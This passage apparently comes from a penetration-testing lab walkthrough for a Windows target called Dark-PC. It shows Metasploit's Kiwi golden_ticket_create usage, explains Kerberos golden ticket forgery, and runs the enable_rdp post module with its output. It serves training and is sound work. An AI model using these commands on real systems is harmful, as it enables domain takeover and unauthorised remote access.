The golden_ticket_create command in Kiwi forges a Kerberos ticket-granting
ticket. It needs the krbtgt account's NTLM hash and the domain SID (the -k
and -s options below), which only come from a domain controller; Dark-PC is
a workgroup machine, so there is nothing to forge against here, but the
usage is worth knowing:
meterpreter > golden_ticket_create
Usage: golden_ticket_create [options]
Create a golden kerberos ticket that expires in 10 years time.
OPTIONS:
-d FQDN of the target domain (required)
-e End in ... Duration in hours (ex: -e 10 for 10 hours), default 10 YEARS
-g Comma-separated list of group identifiers to include (eg: 501,502)
-h Help banner
-i ID of the user to associate the ticket with
-k krbtgt domain user NTLM hash
-s SID of the domain
-t Local path of the file to store the ticket in (required)
-u Name of the user to create the ticket for (required)
meterpreter >
What are Golden Ticket Attacks?
A golden ticket is a forged Kerberos TGT signed with the domain's krbtgt key.
Because every domain controller trusts that key, the ticket authenticates the
attacker as any user with any group memberships for as long as its lifetime
allows, survives user password changes, and only dies when the krbtgt
password is reset twice.
One last thing to note. with the password for the user
'Dark,' we can authenticate to the machine via Remote Desktop (MSRDP). While
this provides a unique perspective, be mindful that connecting via RDP may
disrupt the user currently signed in. If RDP hasn't been enabled, we can do so
using the Metasploit module: run post/windows/manage/enable_rdp.
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20240724000233_default_10.10.162.253_host.windows.cle_109806.txt
meterpreter >
This enables RDP, sets Terminal Services to start automatically and opens the
firewall port, so we can log in and see the machine as the user does. Note
the cleanup resource file written to ~/.msf4/loot; run it at the end of the
engagement to revert those changes.
Let's move on to the final task.
Task 7: Extra Credit
In Task 3 we only used Exploit-DB to identify the CVE; the actual exploitation
went through Metasploit. This task is about doing it by hand.
As you progress in
your pen testing journey, you'll inevitably encounter scenarios where you need
to exploit vulnerabilities without using Metasploit.
We provided a link to an
Exploit-DB entry that details an Icecast vulnerability allowing for remote code
execution. While it's not a requirement for this task, it's highly recommended
to try exploiting the vulnerability using the provided code or a similar
exploit. This will help you develop and refine your manual exploitation skills.
If you have any questions or concerns related to this video,
please feel free to leave them in the comment section below. We're here to
help!